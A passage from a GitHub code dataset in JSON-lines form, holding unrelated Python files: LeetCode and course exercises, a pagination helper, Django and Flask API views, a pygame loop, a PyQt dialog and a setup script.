5]\n\n2、用栈(使用list)实现队列:支持push(element),pop()和top()方法。pop和top方法都应该返回第一个元素。比如执行以下操作序列;push(1),\n pop(),push(2),push(3),top(),pop(),应该返回1,3和2。\n\"\"\"\n\n\ndef spiral_order(matrix):\n ret = []\n rows = len(matrix)\n if rows == 0:\n return ret\n columns = len(matrix[0])\n x, y = 0, 0 # 方阵的左上角坐标\n while (rows > 0) and (columns > 0):\n for k in range(y, y + columns): # 第一行\n ret.append(matrix[x][k])\n if rows > 1: # 行数大于1\n for k in range(x + 1, x + rows): # 最右列\n ret.append(matrix[k][y + columns - 1])\n if columns > 1: # 列数大于1\n for k in range(y + columns - 2, y - 1, -1): # 最下行\n ret.append(matrix[x + rows - 1][k])\n for k in range(x + rows - 2, x, -1): # 最左列\n ret.append(matrix[k][y])\n rows -= 2\n columns -= 2\n x += 1\n y += 1\n return ret\n\n\nlist_queue = []\n\n\ndef push(e):\n global list_queue\n tmp = []\n if len(list_queue) == 0:\n tmp.append(e)\n else:\n revers = list_queue[::-1]\n revers.append(e)\n tmp.extend(revers)\n list_queue = tmp[::-1]\n\n\ndef pop():\n global list_queue\n e = list_queue[0]\n list_queue.remove(e)\n return e\n\n\ndef top():\n return pop()\n\n\nprint(spiral_order([]))\nprint(spiral_order([[1]]))\nprint(spiral_order([[1, 2], [3, 4]]))\nprint(spiral_order([[1, 2, 3], [4, 5, 6], [7, 8, 9]]))\nprint(spiral_order([[1, 2, 3, 'a'], [4, 5, 6, 'b'], [7, 8, 9, 'c']]))\n\npush(1)\nprint(pop())\npush(2)\npush(3)\nprint(top())\nprint(pop())\n","repo_name":"AidenLong/rgzn","sub_path":"workspace/python-base/com/me/day3/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"1770397192","text":"# O(1) - Constant time (Flat line)\n# In this case, the no. of operations do not depend on the size of the input and are always constant\n\n\nimport time\n\nsingle_name = [\"Nemo\"]\neveryone = [\"Nemo\", \"Table\", \"Lola\", \"Toy\"]\nsmall_list = [\"Nemo\" for i in range(10)]\nmedium_list = [\"Nemo\" for m in range(100)]\nlarge_list = [\"Nemo\" for n in range(10000)]\n\n\ndef find_name(names):\n t0 = time.time()\n print(names[0]) # O(1)\n print(names[1]) # O(1)\n t1 = time.time()\n print(f\"Time taken is {t1 - t0}\")\n\n\nfind_name(small_list) # O(1)\nfind_name(medium_list) # O(1)\nfind_name(large_list) # O(1)\n\n# We are not looping over the entire array here and extracting a single element each time\n# We are performing two O(1) operations, which equal to O(2).\n# But since it's constant we can call this fn as O(1) - Constant Time Complexity.\n\n\n","repo_name":"amitaa11/Data-Structures-and-Algos","sub_path":"Big O/O(1).py","file_name":"O(1).py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74394869208","text":"from string import Template\nfrom webhelpers import paginate\nfrom webhelpers.html import HTML\n\n\nclass Page(paginate.Page):\n\n def _pagerlink(self, page, text):\n # Let the url_for() from webhelpers create a new link and set\n # the variable called 'page_param'. Example:\n # You are in '/foo/bar' (controller='foo', action='bar')\n # and you want to add a parameter 'page'. Then you\n # call the navigator method with page_param='page' and\n # the url_for() call will create a link '/foo/bar?page=...'\n # with the respective page number added.\n link_params = {}\n # Use the instance kwargs from Page.__init__ as URL parameters\n link_params.update(self.kwargs)\n # Add keyword arguments from pager() to the link as parameters\n link_params.update(self.pager_kwargs)\n link_params[self.page_param] = page\n\n # Get the URL generator\n if self._url_generator is not None:\n url_generator = self._url_generator\n else:\n try:\n import pylons\n url_generator = pylons.url.current\n except (ImportError, AttributeError):\n try:\n import routes\n url_generator = routes.url_for\n config = routes.request_config()\n except (ImportError, AttributeError):\n raise NotImplementedError(\"no URL generator available\")\n else:\n # if the Mapper is configured with explicit=True we have to fetch\n # the controller and action manually\n if config.mapper.explicit:\n if hasattr(config, 'mapper_dict'):\n for k, v in config.mapper_dict.items():\n if k != self.page_param:\n link_params[k] = v\n\n # Create the URL to load a certain page\n link_url = url_generator(**link_params)\n\n if self.onclick: # create link with onclick action for AJAX\n # Create the URL to load the page area part of a certain page (AJAX\n # updates)\n link_params[self.partial_param] = 1\n partial_url = url_generator(**link_params)\n try: # if '%s' is used in the 'onclick' parameter (backwards compatibility)\n onclick_action = self.onclick % (partial_url,)\n except TypeError:\n onclick_action = Template(self.onclick).safe_substitute({\n \"partial_url\": partial_url,\n \"page\": page\n })\n a_tag = HTML.a(text, href=link_url, onclick=onclick_action, **self.link_attr)\n else: # return static link\n a_tag = HTML.a(text, href=link_url, **self.link_attr)\n li_tag = HTML.li(a_tag)\n return li_tag\n\n def _range(self, regexp_match):\n \"\"\"\n Return range of linked pages (e.g. '1 2 [3] 4 5 6 7 8').\n\n Arguments:\n\n regexp_match\n A \"re\" (regular expressions) match object containing the\n radius of linked pages around the current page in\n regexp_match.group(1) as a string\n\n This function is supposed to be called as a callable in\n re.sub.\n\n \"\"\"\n radius = int(regexp_match.group(1))\n\n # Compute the first and last page number within the radius\n # e.g. '1 .. 5 6 [7] 8 9 .. 12'\n # -> leftmost_page = 5\n # -> rightmost_page = 9\n leftmost_page = max(self.first_page, (self.page - radius))\n rightmost_page = min(self.last_page, (self.page + radius))\n\n nav_items = []\n\n # Create a link to the first page (unless we are on the first page\n # or there would be no need to insert '..' spacers)\n if self.page != self.first_page and self.first_page < leftmost_page:\n nav_items.append(self._pagerlink(self.first_page, self.first_page))\n\n # Insert dots if there are pages between the first page\n # and the currently displayed page range\n if leftmost_page - self.first_page > 1:\n # Wrap in a SPAN tag if nolink_attr is set\n text = '..'\n if self.dotdot_attr:\n text = HTML.span(c=text, **self.dotdot_attr)\n text = HTML.li(text, **{'class': 'disabled'})\n nav_items.append(text)\n\n for thispage in xrange(leftmost_page, rightmost_page + 1):\n # Hilight the current page number and do not use a link\n if thispage == self.page:\n text = '%s' % (thispage,)\n # Wrap in a SPAN tag if nolink_attr is set\n if self.curpage_attr:\n text = HTML.span(c=text, **self.curpage_attr)\n text = HTML.li(text, **{'class': 'active'})\n nav_items.append(text)\n # Otherwise create just a link to that page\n else:\n text = '%s' % (thispage,)\n nav_items.append(self._pagerlink(thispage, text))\n\n # Insert dots if there are pages between the displayed\n # page numbers and the end of the page range\n if self.last_page - rightmost_page > 1:\n text = '..'\n # Wrap in a SPAN tag if nolink_attr is set\n if self.dotdot_attr:\n text = HTML.span(c=text, **self.dotdot_attr)\n text = HTML.li(text, **{'class': 'disabled'})\n nav_items.append(text)\n\n # Create a link to the very last page (unless we are on the last\n # page or there would be no need to insert '..' spacers)\n if self.page != self.last_page and rightmost_page < self.last_page:\n nav_items.append(self._pagerlink(self.last_page, self.last_page))\n\n return self.separator.join(nav_items)","repo_name":"josiah-wolf-oberholtzer/sasha","sub_path":"sasha/tools/viewtools/Page.py","file_name":"Page.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"25917400076","text":"\"\"\"\nException class of the app\nAs well as common messages\n\"\"\"\nfrom .conf import maildict, conf\n\n\nclass AppError(Exception): # base exception of the web app\n pass\n\n\nclass AppAPIError(AppError): # abstract error, directly use not recommended\n status_code = 500\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\nclass InvalidInput(AppAPIError):\n status_code = 422\n\n\nclass PermissionDenied(AppAPIError):\n status_code = 403\n\n\nappmessage = {\n \"mail_check\": \"\"\"\n If you cannot find the mail, you should check junk mails.\\n\n Please make sure the mail address is our official address %s.\n \"\"\" % maildict['sender'],\n\n \"mail_start\": \"\"\"\n This is the mail from %s.\\n\n \"\"\" % conf['MAIL_ABS_PATH']\n}\n","repo_name":"refraction-ray/myarxiv-app","sub_path":"app/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"30506177011","text":"#\n# @lc app=leetcode id=18 lang=python3\n#\n# [18] 4Sum\n#\n\n# @lc code=start\n\n\nclass Solution:\n # two pointers\n def twoSum(self, nums, target):\n res = []\n l, r = 0, len(nums)-1\n\n while l < r:\n sum = nums[l] + nums[r]\n if sum < target or (l > 0 and nums[l] == nums[l-1]):\n l += 1\n elif sum > target or (r < len(nums)-1 and nums[r] == nums[r+1]):\n r -= 1\n else:\n res.append([nums[l], nums[r]])\n l += 1\n r -= 1\n\n return res\n # hash-set\n\n def twoSum(self, nums, target):\n res = []\n s = set()\n\n for i in range(len(nums)):\n if len(res) == 0 or res[-1][1] != nums[i]:\n if target - nums[i] in s:\n res.append([target - nums[i], nums[i]])\n s.add(nums[i])\n\n return res\n\n def kSum(self, nums, target, k):\n if len(nums) == 0 or nums[0] * k > target or target > nums[-1] * k:\n return []\n if k == 2:\n return self.twoSum(nums, target)\n\n res = []\n for i in range(len(nums)):\n if i == 0 or nums[i-1] != nums[i]:\n for _, set in enumerate(self.kSum(nums[i+1:], target-nums[i], k-1)):\n res.append([nums[i]] + set)\n return res\n\n def fourSum(self, nums: List[int], target: int) -> List[List[int]]:\n nums.sort()\n return self.kSum(nums, target, 4)\n# @lc code=end\n","repo_name":"naseeihity/leetcode-daily","sub_path":"two-pointers/18.4-sum.py","file_name":"18.4-sum.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37496093506","text":"class Solution:\n def restoreIpAddresses(self, s: str) -> list[str]:\n ans, path = [], []\n n = len(s)\n\n def backTrack(l: int) -> None:\n if len(path) > 4: #长度超过四个了,剪枝\n return\n if l == n and len(path) == 4:\n ans.append('.'.join(path))\n return\n for i in range(l + 1, min(l + 4, n + 1)):\n cur = s[l:i]\n if (len(cur) > 1 and cur[0] == '0') or int(cur) > 255: #前缀0和大于255的都丢弃\n continue\n path.append(cur[:])\n backTrack(i)\n path.pop()\n backTrack(0)\n return ans","repo_name":"qbnmmm/leetcode","sub_path":"剑指offer/剑指 Offer II 087. 复原 IP.py","file_name":"剑指 Offer II 087. 复原 IP.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33666628338","text":"#!/usr/bin/env python\n# J094\n\"\"\"\nImage capture and save\n\"\"\"\n\n\nimport cv2\n\n\ncap = cv2.VideoCapture(0)\nflag = cap.isOpened()\n\ncap.set(cv2.CAP_PROP_FRAME_WIDTH,1280)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT,480)\n\nindex = 1\n\nwhile (flag):\n ret, frame = cap.read()\n cv2.imshow(\"cheese by cv2\", frame)\n k = cv2.waitKey(1) & 0xFF\n if k == ord('s'): # 按下s键,进入下面的保存图片操作\n cv2.imwrite(\"./\" + str(index) + \".jpg\", frame)\n print(\"save\" + str(index) + \".jpg successfuly!\")\n print(\"-------------------------\")\n index += 1\n elif k == ord('q'): # 按下q键,程序退出\n break\ncap.release() # 释放摄像头\ncv2.destroyAllWindows()# 释放并销毁窗口\n","repo_name":"J094/stereo_vision","sub_path":"image_capture.py","file_name":"image_capture.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74216078487","text":"\"\"\"core URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\n\nfrom apps.user_profiles.urls import router_users, router_managers, router_salesmen, router_supports\nfrom apps.crm.urls import router_clients, router_contracts, router_events\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/login/', TokenObtainPairView.as_view(), name='login'),\n path('api/login/refresh/', TokenRefreshView.as_view(), name='refresh-token'),\n path('api/users/', include(router_users.urls)),\n path('api/managers/', include(router_managers.urls)),\n path('api/salesmen/', include(router_salesmen.urls)),\n path('api/supports/', include(router_supports.urls)),\n path('api/clients/', include(router_clients.urls)),\n path('api/clients//contracts/', include(router_contracts.urls)),\n path('api/clients//contracts//events/',\n include(router_events.urls)),\n]\n\nadmin.site.index_title = 'Epic Events CRM'\nadmin.site.site_header = 'Epic Events Admin'\n","repo_name":"Louack/epic-events-crm","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29614842820","text":"from functions import softmax\nimport numpy as np\n\n\nclass SoftmaxCrossEntropyLoss:\n def __init__(self):\n \"\"\"\n softmax layer with cross entropy loss\n \"\"\"\n self.cache = None\n self.params = []\n self.grads = []\n pass\n\n def forward(self, o, y):\n \"\"\"\n :param o: model output, shape (N, O)\n :param y: true label, shape (N,), where 0<=y[i] 400:\r\n instaciaInimigo()\r\n #instaciaInimigo([0,0],[800,600])\r\n contador=0\r\n\r\n else:\r\n contador+=1\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n exit()\r\n\r\n comando = pygame.key.get_pressed()\r\n if comando[pygame.K_RIGHT]:\r\n pygame.draw.circle(janela, (0, 0, 0), (player.posi[0], player.posi[1]), 50)\r\n player.posi[0] += 1\r\n\r\n if comando[pygame.K_LEFT]:\r\n pygame.draw.circle(janela, (0, 0, 0), (player.posi[0], player.posi[1]), 50)\r\n player.posi[0] -= 1\r\n\r\n if comando[pygame.K_UP]:\r\n pygame.draw.circle(janela, (0, 0, 0), (player.posi[0], player.posi[1]), 50)\r\n player.posi[1] -= 1\r\n\r\n if comando[pygame.K_DOWN]:\r\n pygame.draw.circle(janela, (0, 0, 0), (player.posi[0], player.posi[1]), 50)\r\n player.posi[1] += 1\r\n\r\n if delay > 100:\r\n moveInimigos()\r\n delay=0\r\n\r\n else:\r\n delay+=1\r\n\r\n moveInimigos()\r\n UI()\r\n\r\n pygame.draw.circle(janela, (255,0,0),(player.posi[0], player.posi[1]),50)\r\n pygame.display.update()","repo_name":"joaovbach/bolinhaPy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28010575330","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom .samoloty import*\n\n\nclass menu_samoloty(object):\n def __init__(self,system):\n self.system=system\n\n def setupUi(self, Dialog):\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"modules/ikony/plane.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n Dialog.setWindowIcon(icon)\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(800, 600)\n Dialog.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setSpacing(0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.frame_2 = QtWidgets.QFrame(Dialog)\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame_2)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.label = QtWidgets.QLabel(self.frame_2)\n self.label.setMaximumSize(QtCore.QSize(200, 16777215))\n self.label.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.label.setObjectName(\"label\")\n self.verticalLayout_2.addWidget(self.label)\n self.verticalLayout.addWidget(self.frame_2)\n self.frame = QtWidgets.QFrame(Dialog)\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.comboBox = QtWidgets.QComboBox(self.frame)\n self.comboBox.setMinimumSize(QtCore.QSize(200, 0))\n self.comboBox.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.comboBox.setObjectName(\"comboBox\")\n\n self.comboBox.addItem(\"Regionalny\")\n self.comboBox.addItem(\"Szerokokadlubowy\")\n self.comboBox.addItem(\"Woskokadlubowy\")\n\n\n self.horizontalLayout.addWidget(self.comboBox)\n self.pushButton = QtWidgets.QPushButton(self.frame)\n self.pushButton.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.pushButton.setObjectName(\"pushButton\")\n\n self.pushButton.clicked.connect(Dialog.close)\n\n self.horizontalLayout.addWidget(self.pushButton)\n self.pushButton_2 = QtWidgets.QPushButton(self.frame)\n self.pushButton_2.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.pushButton_2.setObjectName(\"pushButton_2\")\n\n self.pushButton_2.clicked.connect(self.dodaj_samolot)\n self.pushButton_2.clicked.connect(Dialog.close)\n\n self.horizontalLayout.addWidget(self.pushButton_2)\n self.verticalLayout.addWidget(self.frame)\n self.frame_3 = QtWidgets.QFrame(Dialog)\n self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_3.setObjectName(\"frame_3\")\n self.verticalLayout.addWidget(self.frame_3)\n\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dodawanie samolotu\"))\n self.label.setText(_translate(\"Dialog\", \"

    Wybierz samolot

    \"))\n self.pushButton.setText(_translate(\"Dialog\", \"anuluj\"))\n self.pushButton_2.setText(_translate(\"Dialog\", \"dodaj\"))\n\n def dodaj_samolot(self):\n samolot=self.comboBox.currentText()\n if samolot == \"Regionalny\":\n self.system.dodaj_samolot(Regionalny())\n elif samolot == \"Szerokokadlubowy\":\n self.system.dodaj_samolot(Szerokokadlubowy())\n elif samolot == \"Woskokadlubowy\":\n self.system.dodaj_samolot(Waskokadlubowy())\n\n\n\n\n\n\n","repo_name":"Bluefish5/Database-Airplane-System","sub_path":"modules/menu_samoloty.py","file_name":"menu_samoloty.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34256462029","text":"import os\n\nimport localizationpy.mapping as mp\nimport localizationpy.file_manager as fm\n\npoints_number = 100\nx_min = 0.1\nx_max = 20.5\ny_min = 0.1\ny_max = 7.8\nz_min = 1.5\nz_max = 1.5\n\ncube = mp.VectorShape(x_min, x_max, y_min, y_max, z_min, z_max)\n\ngen_rand_points = mp.get_random_points(points_number, cube)\n\nfile_path = os.path.abspath(\"output/100_rand_points.dat\")\nfm.create_points_file(file_path, gen_rand_points)\n","repo_name":"Aportillog/room-location","sub_path":"sample/generate_100_rand_points.py","file_name":"generate_100_rand_points.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35141028101","text":"initial = final = s[0]\n\n#Python has the advantage to compare the characters without comparing their ASCII values, ex: 'a' > 'b' would return False\n\nfor i in range(1, len(s)):\n if s[i] >= initial[-1]:\n initial += s[i]\n if len(initial) > len(final):\n final = initial\n else:\n initial = s[i]\n\nprint('Longest substring in alphabetical order is:', final)\n","repo_name":"Nazaf/MIT-6.00.1","sub_path":"AlphabeticalLongestSubstring.py","file_name":"AlphabeticalLongestSubstring.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22558332514","text":"#!/usr/bin/env python3\n\nimport os\nimport re\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nfrom setuptools.command.build_py import build_py as BuildCommand\n\ndef read(fname):\n with open(os.path.join(os.path.dirname(__file__), fname)) as fildes:\n return fildes.read()\n\nclass NoseTestCommand(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n # Run nose ensuring that argv simulates running nosetests directly\n import nose\n nose.run_exit(argv=['nosetests'])\n\nclass BuildWithVersionCommand(BuildCommand):\n def run(self):\n BuildCommand.run(self)\n if not self.dry_run:\n version_fname = os.path.join(self.build_lib, 'vhdeps', 'version.py')\n with open(version_fname, 'w') as fildes:\n fildes.write('__version__ = \"\"\"' + self.distribution.metadata.version + '\"\"\"\\n')\n\nsetup(\n name = 'vhdeps',\n version_config={\n 'version_format': '{tag}+{sha}',\n 'starting_version': '0.0.1'\n },\n author = 'Jeroen van Straten',\n author_email = 'j.vanstraten-1@tudelft.nl',\n description = (\n 'VHDL dependency analyzer and simulation driver.'\n ),\n license = 'Apache',\n keywords = 'vhdl dependency analyzer simulation',\n url = 'https://github.com/abs-tudelft/vhdeps',\n long_description = read('README.md'),\n long_description_content_type = 'text/markdown',\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3',\n ],\n project_urls = {\n 'Source': 'https://github.com/abs-tudelft/vhdeps',\n },\n packages = ['vhdeps', 'vhdeps.targets'],\n entry_points = {'console_scripts': ['vhdeps=vhdeps:run_cli']},\n python_requires = '>=3',\n install_requires = [\n 'plumbum',\n 'lcov_cobertura',\n ],\n setup_requires = [\n 'better-setuptools-git-version',\n 'setuptools-lint',\n 'pylint',\n ],\n tests_require = [\n 'nose',\n 'coverage',\n 'lcov_cobertura',\n ],\n cmdclass = {\n 'test': NoseTestCommand,\n 'build_py': BuildWithVersionCommand,\n },\n)\n","repo_name":"abs-tudelft/vhdeps","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"31"} +{"seq_id":"10350851586","text":"from django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import generics, status\nfrom back.models import Project, Activity\nfrom back.serializers import ProjectSerializer, ProjectListSerializer\nfrom back.services import (\n ProjectEmailNotificationService as mail_service,\n PredefinedDocHandlingService,\n)\n\n\nclass ProjectList(generics.ListAPIView):\n serializer_class = ProjectListSerializer\n\n def get_queryset(self):\n user = self.request.user\n if user.role == \"Contr\":\n return Project.objects.filter(\n # company=user.company,\n contractor=user,\n deleted=False,\n )\n return Project.objects.filter(company=user.company, deleted=False)\n\n\nclass ProjectCreate(generics.CreateAPIView):\n queryset = Project.objects.all()\n serializer_class = ProjectSerializer\n\n def create(self, request, *args, **kwargs):\n res = super(ProjectCreate, self).create(request, args, kwargs)\n project = Project.objects.get(pk=res.data[\"id\"])\n activity = Activity(\n project=project, author=request.user, company=project.company\n )\n activity.project_created_message()\n email = mail_service(project=project, receivers=[project.contractor])\n email.send_project_created()\n\n PredefinedDocHandlingService(project=project).create_documents()\n\n return res\n\n\nclass ProjectDetail(generics.RetrieveUpdateDestroyAPIView):\n serializer_class = ProjectSerializer\n\n def get_queryset(self):\n user = self.request.user\n if user.role == \"Contr\":\n return Project.objects.filter(contractor__pk=user.pk, deleted=False)\n return Project.objects.filter(company=user.company, deleted=False)\n\n def patch(self, request, *args, **kwargs):\n\n if kwargs[\"pk\"]:\n prev_project = Project.objects.get(pk=kwargs[\"pk\"])\n\n res = super(ProjectDetail, self).patch(request, args, kwargs)\n project = Project.objects.get(pk=res.data[\"id\"])\n if prev_project.status != project.status:\n activity = Activity(\n project=project, author=request.user, company=project.company\n )\n activity.project_status_updated_message(project.status)\n mail = mail_service(project=project, receivers=[project.contractor])\n mail.send_project_updated()\n if project.status == \"Closed\":\n project.permits.update(active=False)\n return res\n\n def destroy(self, request, pk):\n queryset = self.get_queryset()\n project = get_object_or_404(queryset, pk=pk)\n project.deleted = True\n project.save()\n return JsonResponse(\n data={\"response\": f\"project {project.name} deleted.\"},\n status=status.HTTP_204_NO_CONTENT,\n )\n","repo_name":"Vasyl82/FOX","sub_path":"back/views/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9620317610","text":"from flask import Blueprint, g, request, jsonify, escape\nfrom ..extensions import (\n auth, limiter, handleApiPermission, cache, record\n)\nimport json\nfrom PIL import Image\nimport imagehash\nfrom tempfile import TemporaryDirectory\nfrom base64 import b64encode\nfrom uuid import uuid4\nimport os.path\nfrom imghdr import what as what_img\nfrom imghdr import tests\n\nALLOWED_EXTENSIONS = [\"gif\", \"png\", \"jpg\", \"jpeg\", \"webp\"]\n\nJPEG_MARK = b'\\xff\\xd8\\xff\\xdb\\x00C\\x00\\x08\\x06\\x06' \\\n b'\\x07\\x06\\x05\\x08\\x07\\x07\\x07\\t\\t\\x08\\n' \\\n b'\\x0c\\x14\\r\\x0c\\x0b\\x0b\\x0c\\x19\\x12\\x13\\x0f'\n\n\ndef test_jpeg(h, f):\n \"\"\"JPEG data in JFIF format\"\"\"\n if b'JFIF' in h[:23]:\n return 'jpeg'\n \"\"\"JPEG with small header\"\"\"\n if len(h) >= 32 and 67 == h[5] and h[:32] == JPEG_MARK:\n return 'jpeg'\n \"\"\"JPEG data in JFIF or Exif format\"\"\"\n if h[6:10] in (b'JFIF', b'Exif') or h[:2] == b'\\xff\\xd8':\n return 'jpeg'\n\n\ntests.append(test_jpeg)\n\n\ndef isNotAllowedFile(filename):\n if filename == \"\"\\\n or '.' not in filename\\\n or (filename.rsplit('.', 1)[1].lower()\n not in ALLOWED_EXTENSIONS):\n return True\n return False\n\n\ndef getMylistCountDict(illustIDs):\n illustKey = \",\".join([str(i) for i in illustIDs])\n mylistData = {\n i[0]: i[1]\n for i in g.db.get(\n f\"\"\"SELECT illustID, COUNT(mylistID) FROM data_mylist\n GROUP BY illustID\n HAVING illustID IN ({illustKey})\"\"\"\n )\n }\n mylistDict = {\n str(i): mylistData[i]\n if i in mylistData else 0\n for i in illustIDs\n }\n return mylistDict\n\n\ndef getMylistedDict(illustIDs):\n illustKey = \",\".join([str(i) for i in illustIDs])\n mylistedData = g.db.get(\n f\"\"\"SELECT illustID FROM data_mylist\n WHERE mylistID IN\n (SELECT mylistID FROM info_mylist WHERE userID={g.userID})\n AND illustID IN ({illustKey})\"\"\"\n )\n mylistedData = [i[0] for i in mylistedData]\n mylistedDict = {\n str(i): True if i in mylistedData else False\n for i in illustIDs\n }\n return mylistedDict\n\n\ndef getSearchCountResult(whereSql, placeholder=()):\n illustCount = g.db.get(\n f\"\"\"SELECT COUNT(DISTINCT illustID) FROM data_illust\n WHERE {whereSql}\"\"\",\n placeholder\n )\n return illustCount[0][0]\n\n\ndef getSearchResult(whereSql, illustCount, resultTitle, placeholder=()):\n per_page = 20\n pageID = request.args.get('page', default=1, type=int)\n if pageID < 1:\n pageID = 1\n sortMethod = request.args.get('sort', default=\"d\", type=str)\n sortMethod = \"illustDate\" if sortMethod == \"d\" else \"illustLike\"\n order = request.args.get('order', default=\"d\", type=str)\n order = \"DESC\" if order == \"d\" else \"ASC\"\n pages, extra_page = divmod(illustCount, per_page)\n if extra_page > 0:\n pages += 1\n illusts = g.db.get(\n f\"\"\"SELECT illustID,data_illust.artistID,illustName,illustDescription,\n illustDate,illustPage,illustLike,\n illustOriginUrl,illustOriginSite,illustNsfw,artistName,\n illustExtension,illustStatus\n FROM data_illust INNER JOIN info_artist\n ON data_illust.artistID = info_artist.artistID\n WHERE {whereSql}\n AND illustStatus=0\n ORDER BY {sortMethod} {order}\n LIMIT {per_page} OFFSET {per_page * (pageID - 1)}\"\"\",\n placeholder\n )\n # ないとページ番号が不正なときに爆発する\n if not len(illusts):\n return jsonify(\n status=200,\n message=\"not found\",\n data={\n \"title\": resultTitle,\n \"count\": illustCount,\n \"current\": pageID,\n \"pages\": pages,\n \"imgs\": []\n }\n )\n illustIDs = [i[0] for i in illusts]\n # マイリストされた回数を気合で取ってくる\n mylistDict = getMylistCountDict(illustIDs)\n # 自分がマイリストしたかどうかを気合で取ってくる\n mylistedDict = getMylistedDict(illustIDs)\n return jsonify(\n status=200,\n message=\"found\",\n data={\n \"title\": resultTitle,\n \"count\": illustCount,\n \"current\": pageID,\n \"pages\": pages,\n \"imgs\": [{\n \"illustID\": i[0],\n \"artistID\": i[1],\n \"title\": i[2],\n \"caption\": i[3],\n \"date\": i[4].strftime('%Y-%m-%d %H:%M:%S'),\n \"pages\": i[5],\n \"like\": i[6],\n \"mylist\": mylistDict[str(i[0])],\n \"mylisted\": mylistedDict[str(i[0])],\n \"originUrl\": i[7],\n \"originService\": i[8],\n \"nsfw\": i[9],\n \"artist\": {\n \"name\": i[10]\n },\n \"extension\": i[11]\n } for i in illusts]\n }\n 